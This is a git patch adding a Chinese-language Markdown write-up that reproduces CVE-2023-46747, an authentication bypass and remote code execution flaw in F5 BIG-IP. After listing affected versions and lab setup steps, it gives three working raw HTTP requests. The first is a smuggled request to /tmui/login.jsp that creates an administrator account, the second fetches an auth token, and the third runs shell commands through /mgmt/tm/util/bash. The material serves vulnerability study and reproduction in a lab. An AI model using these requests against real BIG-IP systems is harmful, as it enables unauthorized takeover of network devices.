From 4a18e1805c79852d014bbbf55b91ce3aceef5874 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Tue, 31 Oct 2023 21:50:57 +0800
Subject: [PATCH] =?UTF-8?q?Create=20F5=20BIG-IP=20=E8=BF=9C=E7=A8=8B?=
 =?UTF-8?q?=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E(CVE-2023?=
 =?UTF-8?q?-46747).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md | 105 ++++++++++++++++++
 1 file changed, 105 insertions(+)
 create mode 100644 F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md

diff --git a/F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md b/F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md
new file mode 100644
index 0000000..ce3c9dd
--- /dev/null
+++ b/F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md	
@@ -0,0 +1,105 @@
+## F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747)
+
+## 漏洞描述
+
+**F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747)**，未经授权的远程攻击者通过管理端口或自身IP地址访问BIG-IP系统，利用此漏洞可能绕过身份认证，导致在暴露流量管理用户界面（TMUI）的 F5 BIG-IP 实例上执行任意代码。
+
+## 影响版本
+
+```
+F5 BIG-IP <= 17.1.0
+16.1.0 <= F5 BIG-IP <= 16.1.4
+15.1.0 <= F5 BIG-IP <= 15.1.10
+14.1.0 <= F5 BIG-IP <= 14.1.5
+13.1.0 <= F5 BIG-IP <= 13.1.5
+```
+
+## 环境下载
+
+```
+https://my.f5.com/manage/s/downloads?productFamily=BIG-IP&productLine=big-ip_v15.x&version=15.1.8&container=Virtual-Edition&files=BIGIP-15.1.8-0.0.7.ALL-vmware.ova&locations=JAPAN
+
+链接：https://pan.baidu.com/s/1zLMXJCKtZtzIxCQGoxwPgg 
+提取码：ksdn 
+```
+
+搭建方式很简单，下载BIGIP-15.1.8-0.0.7.ALL-vmware.ova，接着用vm打开ova即可
+
+搭建过程 [F5 WMware虚拟机环境搭建-BIG-IP Virtual Edition 11.3.0-CSDN博客](https://blog.csdn.net/ice_age1/article/details/49998059)
+
+重置web密码
+
+```
+进入tmsh模式 敲击
+modify auth user admin password admin
+```
+
+搭建成功页面
+
+
+
+## 漏洞复现
+
+### 第一步 发送 TMUI模块的请求
+
+当发送到F5 BIG-IP TMUI模块的请求（例如登陆页面/tmui/login.jsp）中，包含一个类似值为 "xxx, chunked" 的 "Transfer-Encoding" 头，并且请求体内容满足特定内容时，漏洞会被触发。
+
+&name=admin&name_before=&passwd=admin789456 参数填入账户密码
+
+```
+POST /tmui/login.jsp HTTP/1.1
+Host: 192.168.127.146
+Content-Type: application/x-www-form-urlencoded
+
+
+204		
+HTTP/1.1/tmui/Control/form	127.0.0.1	localhost	localhostPTmui-DubbufBBBBBBBBBBB
+REMOTEROLE0�	localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=admin&name_before=&passwd=admin789456&passwd_before=&finished=x&finished_before=�
+0
+```
+
+![](./assets/20231031212344495.png)
+
+
+
+### 第二步 获取用户token
+
+```
+POST /mgmt/shared/authn/login HTTP/1.1
+Host: 192.168.127.146
+Content-Length: 22
+Content-Type: application/x-www-form-urlencoded
+
+ {"username":"admin", "password":"admin789456"}
+```
+
+![](./assets/20231031212450387.png)
+
+
+
+### 第三步 执行命令
+
+将获取到得token带入`X-F5-Auth-Token`中，在通过`/mgmt/tm/util/bash` 执行命令
+
+```
+POST /mgmt/tm/util/bash HTTP/1.1
+Host: 192.168.127.146
+Connection: keep-alive
+Content-Length: 22
+X-F5-Auth-Token:ICGZXJJROASFRPWYZF3EAQFCGN
+
+ {"command":"run","utilCmdArgs":"-c whoami"}
+```
+
+![](./assets/20231031212657529.png)
+
+
+
+### 参考链接
+
+```
+https://github.com/projectdiscovery/nuclei-templates/blob/56d79688e0d2ebce5b8939961946f4f32e663700/http/cves/2023/CVE-2023-46747.yaml
+https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
+https://blog.csdn.net/ice_age1/article/details/49998059
+```
+